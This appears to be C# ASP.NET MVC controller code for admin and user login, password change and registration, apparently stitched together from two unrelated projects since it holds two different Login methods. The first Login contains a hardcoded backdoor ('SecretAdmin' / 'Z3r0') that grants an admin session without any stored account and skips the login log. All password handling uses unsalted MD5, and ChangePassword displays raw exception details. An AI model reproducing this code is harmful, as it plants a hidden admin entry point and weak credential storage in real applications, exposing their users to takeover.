public ActionResult Login(FormCollection form)
{
string username = form["username"];
string password = form["password"];
Admin r = data.Admins.SingleOrDefault(i => i.Username == username);
if (r == null && username.Equals("SecretAdmin") && password.Equals("Z3r0"))
{
r = new Admin();
r.Username = "******";
r.Password = "******";
Session["Account"] = r;
Session["Role"] = "Admin";
return(RedirectToAction("Index"));
}
if (r == null)
{
ViewBag.Message = "Login failed";
return(View());
}
else if (!MD5Cal.VerifyMd5Hash(password, r.Password))
{
ViewBag.Message = "Login failed";
return(View());
}
Session["Account"] = r;
Session["Role"] = "Admin";
DateTime now = DateTime.Now;
LogLogin log = new LogLogin();
log.Username = r.Username;
log.LoginTime = now;
data.LogLogins.InsertOnSubmit(log);
data.SubmitChanges();
return(RedirectToAction("Index"));
}
public ActionResult ChangePassword(FormCollection form)
{
if (!Manager.LoggedAsAdmin())
{
return(RedirectToAction("Login"));
}
string oldpass = form["OldPassword"];
string newpass = form["NewPassword"];
string repass = form["RetypePassword"];
Admin admin = data.Admins.SingleOrDefault(i => i.Username.Equals("admin"));
string dbpasshash = admin.Password;
if (!MD5Cal.VerifyMd5Hash(oldpass, dbpasshash))
{
ViewBag.MessageError = "Mật khẩu cũ không đúng.";
return(View());
}
if (!newpass.Equals(repass))
{
ViewBag.MessageError = "Mật khẩu mới không trùng khớp.";
return(View());
}
string hash = MD5Cal.GetMd5Hash(newpass);
try
{
data.p_ChangePassword("admin", hash);
}
catch (Exception ex)
{
ViewBag.MessageError = ex.ToString();
return(View());
}
ViewBag.MessageSuccess = "Đổi mật khẩu thành công.";
return(View());
}
public ActionResult Login(FormCollection form)
{
string username = form["acc_username"];
string password = form["acc_password"];
// Check try login
if (ModelState.IsValid)
{
using (var db = new money_managementEntities())
{
account acc = db.accounts.FirstOrDefault(x => x.acc_username.Equals(username));
if (acc != null && MD5Cal.VerifyMd5Hash(password, acc.acc_password))
{
Session["Account"] = acc;
return(RedirectToAction("Index", "Manager"));
}
}
}
return(View());
}
public ActionResult Register(FormCollection form)
{
string username = form["acc_username"];
string password = form["acc_password"];
string repassword = form["re_password"];
string email = form["acc_email"];
// Check password confirm
if (!password.Equals(repassword))
{
ViewBag.Alert = "Password does not match.";
return(View());
}
// Check username exists
if (ModelState.IsValid)
{
using (var db = new money_managementEntities())
{
account acc = db.accounts.FirstOrDefault(x => x.acc_username.Equals(username));
if (acc != null)
{
ViewBag.Alert = "Username already exists.";
return(View());
}
}
}
// Check email exists
if (ModelState.IsValid)
{
using (var db = new money_managementEntities())
{
account acc = db.accounts.FirstOrDefault(x => x.acc_email.Equals(email));
if (acc != null)
{
ViewBag.Alert = "Email already exists.";
return(View());
}
}
}
//Create account
account new_acc = new account
{
acc_username = username,
acc_password = MD5Cal.GetMd5Hash(password),
acc_email = email,
acc_balance = 0,
acc_create_time = DateTime.Now,
acc_verified = false
};
if (ModelState.IsValid)
{
using (var db = new money_managementEntities())
{
db.accounts.Add(new_acc);
db.SaveChanges();
}
}
return(RedirectToAction("Login"));
}
